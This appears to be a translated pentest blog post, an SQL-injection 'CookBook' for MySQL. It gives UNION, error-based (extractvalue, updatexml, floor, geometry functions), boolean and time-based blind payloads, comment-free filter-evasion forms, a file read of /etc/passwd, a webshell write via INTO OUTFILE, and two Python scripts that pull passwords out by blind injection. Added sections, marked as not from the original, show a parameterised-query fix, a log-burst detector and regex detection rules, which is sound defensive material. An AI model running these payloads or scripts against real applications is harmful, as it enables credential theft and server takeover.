SQL-Injection “CookBook” (Handbook, Basic Edition)
in Pentest with 1 comment

Incomplete; when I have time I will tidy the formatting and keep adding to it. Compiled from p0's notes; I will add more detail later and try to make it more complete, plus a separate post on getting past WAFs.

MySQL

Current user: user()
Database version: version()
Database name: database()
Operating system: @@version_compile_os

List all users:
select group_concat(user) from mysql.user
User hashes:
select group_concat(password) from mysql.user where user = 'root'
All databases:
select group_concat(schema_name) from information_schema.schemata
Table names (replace '数据库名' / '库名' with the database name):
select group_concat(table_name) from information_schema.tables where table_schema = '数据库名'
// only tables that carry integrity constraints (primary key, NOT NULL, etc.) can be found with this query
select group_concat(table_name) from information_schema.table_constraints where table_schema = '库名'
Column names (replace '表名' with the table name):
select group_concat(column_name) from information_schema.columns where table_name = '表名'
Read a file:
select load_file('/etc/passwd')
Write a file:
select "<?php phpinfo();?>" into outfile '/var/www/html/shell.php'

UNION-based injection

1. order by x
2. union select 1,2,3 ...
Full SQL statement:
select * from users where id ='1' and 1=2 union select 1,2,(select user());--+'

The information-gathering statements from the top of the page can be dropped into the union position.
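
How a parameterised query defeats the UNION payload above, as an added example (not code from the original page): a constructed in-memory SQLite table stands in for MySQL, so `sqlite_version()` replaces `user()` in the page's payload; `lookup_vulnerable`, `lookup_safe` and `demo` are hypothetical names.

```python
import sqlite3


def make_db():
    """Constructed sample table (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, username text, password text)")
    conn.executemany(
        "insert into users values (?,?,?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # The quoted value is pasted straight into the SQL text, so whatever the
    # client sends becomes part of the statement the parser sees.
    sql = "select id, username, password from users where id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameterised: the driver binds the value separately from the SQL text,
    # so the quote, AND/UNION and the comment marker stay inside the data.
    return conn.execute(
        "select id, username, password from users where id = ?", (user_id,)
    ).fetchall()


# The page's UNION payload, adapted to SQLite (sqlite_version() in place of user()).
PAYLOAD = "1' and 1=2 union select 1,2,(select sqlite_version())--"


def demo():
    """Run the same input through both lookups and return the three results."""
    conn = make_db()
    return {
        "normal": lookup_safe(conn, 1),
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "safe": lookup_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

`demo()` shows the vulnerable lookup returning the injected row `(1, 2, '<sqlite version>')` while the parameterised lookup returns no rows: the whole string is bound as the value of `id`, so nothing in it is ever parsed as SQL.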

Error-based injection

MySQL error-based injection:

Error-based injection with floor().

floor(): rounds a value down

mysql> select *from users where id =1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1062 - Duplicate entry 'root@localhost1' for key 'group_key'
mysql>

Error-based injection with the extractvalue() function (length-limited: at most 32 characters)

extractvalue(): queries and modifies XML documents

mysql> select * from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

The updatexml() function (length-limited: at most 32 characters)

updatexml(): queries and modifies XML documents

mysql> select * from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

geometrycollection()

A geometrycollection is a geometry made up of one or more geometry objects of any type

mysql> select * from users where id=1 and geometrycollection((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql> 

multipoint()

multipoint():Construct MultiPoint from Point values

mysql> select * from users where id=1 and multipoint((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

polygon()

polygon(): looks up points within a specified area.

mysql> select * from users where id=1 and polygon((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

multipolygon()

mysql> select * from users where id=1 and multipolygon((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

linestring()

mysql> select * from users where id=1 and linestring((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

multilinestring()

mysql> select * from users where id=1 and multilinestring((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

exp() (MySQL 5.5.5 and above)

exp(): returns e raised to the power x

mysql> select * from users where id=1 and exp(~(select * from(select user())a));
1690 - DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
mysql>

Boolean-based blind injection

Ways of constructing the boolean condition:

// normal case
'or bool#
true'and bool#

// without spaces or comments
'or(bool)='1
true'and(bool)='1

// without or, and, or comments
'^!(bool)='1
'=(bool)='
'||(bool)='1
true'%26%26(bool)='1
'=if((bool),1,0)='0

// without the equals sign, spaces, or comments
'or(bool)<>'0
'or((bool)in(1))or'0

// other forms
or (case when (bool) then 1 else 0 end)

1' or (bool) or '1'='1
1%' and (bool) or 1=1 and '1'='1

Constructing the logical test

Common functions for the logical test:
left(user(),1)>'r'
right(user(),1)>'r'
substr(user(),1,1)='r'
mid(user(),1,1)='r'

// without commas
user() regexp '^[a-z]'
user() like 'root%'
POSITION('root' in user())
mid(user() from 1 for 1)='r'
mid(user() from 1)='r'

A typical Python boolean-based blind injection script

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests

# Boolean-based blind extraction: one request per (position, candidate byte);
# a true condition is recognised by the "You are in" marker in the response.
url = "http://127.0.0.1/sqli/?id=5"
data = "1234567890abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
payload = "' and ascii(substring((select password from users where id =1),{0},1)) = {1} %23"
password = ""
for i in range(1, 32):
    for j in data:
        j = ord(j)
        exp = url + payload.format(i, j)
        res = requests.get(exp)
        if "You are in" in res.text:
            password += chr(j)
            print(password)

ORDER BY-based blind injection

Scenario: in some cases the username field of a login form is injectable. Besides a universal-password bypass and time-based blind injection (which fails when the delay function is filtered), ORDER BY can also be used for boolean-based blind injection.

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
+----+----------+----------------------------------+
2 rows in set
mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set
mysql>

Script for ORDER BY-based blind injection.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests

# ORDER BY blind extraction: the injected row sorts before or after the real
# row depending on the guessed prefix, which changes which row the login
# logic sees first and therefore whether "password error!" is returned.
url = "http://127.0.0.1/order_by_blind.php"
exploit = "' or 1 union select 1,2,'{0}{1}' order by 3 #"
payloads = "0123456789abcdefghijklmnopqrstuvwxyz"
passwd = ""
for i in range(1, 32):
    for p in payloads:
        exp = exploit.format(passwd, p)
        data = {"uname": exp, "passwd": "drop"}
        res = requests.post(url, data=data)
        if "password error!" in res.text:
            passwd += chr(ord(p) - 1)
            print(passwd)
            break  # one character per position; move on to the next
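
What the two scripts above look like from the server side, as an added defender-side example (not code from the original page): a boolean or ORDER BY blind loop sends a burst of near-identical requests to one endpoint and gets back only two distinct response bodies (the true and false pages), so a log scan can flag that pattern without knowing the payload. The log lines are constructed here, and `parse_line`, `find_blind_enumeration` and `build_sample_log` are hypothetical names.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-format fields needed: client, timestamp, path (query stripped), response size.
LOG_RX = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) ([^? ]+)\S* HTTP/[\d.]+" (\d{3}) (\d+)'
)


def parse_line(line):
    """Return (client, timestamp, path, size) or None for lines that do not parse."""
    m = LOG_RX.match(line)
    if not m:
        return None
    client, ts, path, _status, size = m.groups()
    return client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(size)


def find_blind_enumeration(lines, window=timedelta(seconds=60), min_requests=20, max_sizes=2):
    """Return (client, path, burst_size) for client/endpoint pairs that sent at
    least `min_requests` requests inside `window` and received at most
    `max_sizes` distinct response sizes: the two-state oracle that a boolean or
    ORDER BY blind script drives, whose requests differ only in one parameter."""
    by_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            client, ts, path, size = rec
            by_key[(client, path)].append((ts, size))
    flagged = []
    for (client, path), recs in by_key.items():
        recs.sort()
        best = 0
        start = 0
        for end in range(len(recs)):           # sliding time window over the requests
            while recs[end][0] - recs[start][0] > window:
                start += 1
            burst = recs[start:end + 1]
            if len(burst) >= min_requests and len({s for _, s in burst}) <= max_sizes:
                best = max(best, len(burst))
        if best:
            flagged.append((client, path, best))
    return flagged


def build_sample_log():
    """Constructed sample (not real traffic): one client running the page's
    boolean payload once per candidate character against /sqli/, plus ordinary
    browsing from a second client."""
    base = datetime(2024, 1, 1, 10, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(40):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        size = 512 if i % 3 == 0 else 498        # "You are in" page vs. the false page
        payload = ("1%27%20and%20ascii(substring((select%20password%20from%20users"
                   f"%20where%20id%20=1),{i // 2 + 1},1))%20=%20{97 + i % 26}%20%23")
        lines.append(f'10.0.0.9 - - [{ts}] "GET /sqli/?id={payload} HTTP/1.1" 200 {size}')
    for i in range(5):
        ts = (base + timedelta(seconds=10 * i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(f'10.0.0.5 - - [{ts}] "GET /news/?page={i} HTTP/1.1" 200 {1000 + 37 * i}')
    return lines


if __name__ == "__main__":
    print(find_blind_enumeration(build_sample_log()))
```

The thresholds are assumptions to tune per site; a paginated listing can also produce many requests with few response sizes, so the flag is a starting point for review rather than a verdict.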

Time-based blind injection

Scenario: some pages that feed input into a database query show no output at all and no boolean difference either. A time delay can then be used to evaluate the boolean.
In general, anything that can be exploited with boolean blind injection can also be exploited time-based; the difference is adding a conditional and a delay function to the blind payload.
General form:
if((bool),sleep(3),0)
or (case when (bool) then sleep(3) else 0 end)

Two delay functions:
BENCHMARK(100000,md5(1)): used for testing function performance; runs md5(1) 100000 times
sleep(3)
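
Signature detection for the error-based, boolean and time-based primitives listed in the sections above, as an added defender-side example (not code from the original page): requests are percent-decoded (twice, to catch double encoding), case-folded and stripped of the `/**/` separators from the boolean section before the rules run. The log lines are constructed, and `RULES`, `normalise`, `classify` and `scan` are hypothetical names.

```python
import re
from urllib.parse import unquote_plus

# One rule per primitive family on this page: (rule name, regex over the
# decoded, lower-cased request target).
RULES = [
    ("error_xpath", re.compile(r"\b(extractvalue|updatexml)\s*\(")),
    ("error_floor_rand", re.compile(r"\bfloor\s*\(\s*rand\s*\(")),
    ("error_geometry", re.compile(
        r"\b(geometrycollection|multipoint|polygon|multipolygon|linestring|multilinestring)\s*\(")),
    ("error_exp", re.compile(r"\bexp\s*\(\s*~")),
    ("time_delay", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b")),
    ("boolean_probe", re.compile(
        r"\b(substr|substring|mid|left|right|ascii)\s*\(.*(=|<|>|like|regexp)")),
]


def normalise(request_target):
    """Decode percent-encoding twice, fold case, drop inline comments used as
    separators and collapse whitespace so the rules see one canonical form."""
    s = unquote_plus(unquote_plus(request_target)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)


def classify(request_target):
    """Return the names of every rule that matches the request target."""
    decoded = normalise(request_target)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(log_lines):
    """Return (line number, matched rules) for each combined-format log line that hits a rule."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        tags = classify(m.group(1))
        if tags:
            hits.append((n, tags))
    return hits


# Constructed sample lines (not real traffic); the payloads are the ones shown on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/?id=5 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/?id=1%27%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23 HTTP/1.1" 500 120',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/?id=1%27%20and%20ascii(substring((select%20password%20from%20users%20where%20id%20=1),1,1))%20=%2097%20%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/?id=1%27%20and%20if((1=1),sleep(3),0)%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/?id=1%27/**/and/**/exp(~(select*from(select%20user())a))%23 HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG):
        print(n, tags)
```

Signature rules catch the function names the page relies on but miss the keyword-free boolean forms in the section above (`'^!(bool)='1`, `'=(bool)='`), which is why a volume-based check on the same log is the usual complement.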

MySQL comment and terminator symbols:

/* .... */

`
;%00

INSERT- and UPDATE-based injection

INSERT and UPDATE generally use error-based injection:

mysql> insert into users values(16,"dr0op",'dr0op' and updatexml(1,concat(0x7e,user(),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

If there is no error output, INSERT can use time-based injection;
UPDATE can use boolean blind and time-based injection.

Error-based injection

mysql> update emails set email_id = 'dr0op@qq.com' or updatexml(1,concat(0x7e,user(),0x7e),1) where id =7;
1105 - XPATH syntax error: '~root@localhost~'
mysql>

Error-based injection with a subquery

mysql> update emails set email_id = 'dr0op@qq.com' and (select updatexml(1,concat(0x7e,user(),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

Blind injection after ORDER BY

Error-based

mysql> select * from users order by 1 and extractvalue(1,concat(0x7e,user(),0x7e));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

Boolean-based blind

mysql> select * from users order by if(1,1,(select 1 union select 2));
+----+----------+----------------------+
| id | username | password             |
+----+----------+----------------------+
|  1 | Dumb     | Dumb                 |
|  2 | Angelina | I-kill-you           |
|  3 | Dummy    | p@ssword             |
|  4 | secure   | crappy               |
|  5 | stupid   | stupidity            |
|  6 | superman | genious              |
|  7 | batman   | mob!le               |
|  8 | admin    | admin                |
|  9 | admin1   | admin1               |
| 10 | admin2   | admin2               |
| 11 | admin3   | admin3               |
| 12 | dhakkan  | dumbo                |
| 14 | admin4   | admin4               |
| 15 | test     | g98fsadasdvfdsrgsdin |
+----+----------+----------------------+
14 rows in set
mysql> select * from users order by if(0,1,(select 1 union select 2));
1242 - Subquery returns more than 1 row
mysql>

Time-based (not recommended)

order by if(1,sleep(3),0);

Injection with a controllable table name

The case where the table name is only partially controllable, the table name in DESC is wrapped in identifier quotes, but the table name in SELECT is not.

http://www.yulegeyu.com/2017/04/16/%E5%BD%93%E8%A1%A8%E5%90%8D%E5%8F%AF%E6%8E%A7%E7%9A%84%E6%B3%A8%E5%85%A5%E9%81%87%E5%88%B0%E4%BA%86Describe%E6%97%B6%E7%9A%84%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E3%80%82/

Responses
  1. Very detailed